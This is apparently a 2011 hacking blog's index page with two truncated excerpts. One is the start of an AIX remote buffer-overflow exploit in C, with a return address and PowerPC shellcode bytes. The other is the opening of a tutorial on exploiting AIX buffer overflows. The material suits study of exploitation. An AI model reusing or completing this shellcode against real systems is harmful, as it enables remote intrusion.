Blackmygo

Wednesday, February 2, 2011

AIX Exploit

5:51 PM

Blackmygo

/* client.c - remote overflow demo * * 2004.06.16 * san@nsfocus.com */ #include #include #include #include #include #include #include #include #include #include #include #include #include // It needs adjust. #define RET 0x2ff22d88; unsigned char sh_Buff[] = "\x7e\x94\xa2\x79" /* xor. r20,r20,r20 */ "\x40\x82\xff\xfd" /* bnel */ "\x7e\xa8\x02\xa6" /* mflr r21 */ "\x3a\xc0\x01\xff" /* lil r22,0x1ff */ "\x3a\xf6\xfe\x2d" /* cal r23,-467(r22) */ "\x7e\xb5\xba\x14" /* cax r21,r21,r23 */ "\x7e\xa9\x03\xa6" /* mtctr r21 */ "\x4e\x80\x04\x20" /* bctr */ "\x05\x82\x53\xa0"...

Read more »

Tutorial Exploiting AIX (Buffer Overflows)

5:43 PM

Blackmygo

Author: san (san_at_xfocus.org) --[ 1 - Familiar with PowerPC architecture(32 bit) The PowerPC architecture is a Reduced Instruction Set Computer (RISC) architecture, with over two hundred defined instructions. PowerPC is RISC in that most instructions execute in a single cycle and typically perform a single operation (such as loading storage to a register, or storing a register to memory). PowerPC instructions are of uniform length of 32 bits and there are almost 12 instruction formats, which reflect 5 primary classes of instructions: - branch instructions, - fixed-point instructions, - floating-point instructions, - load and store instructions, - processor control instructions. PowerPC's application-level registers are broken into three...

Read more »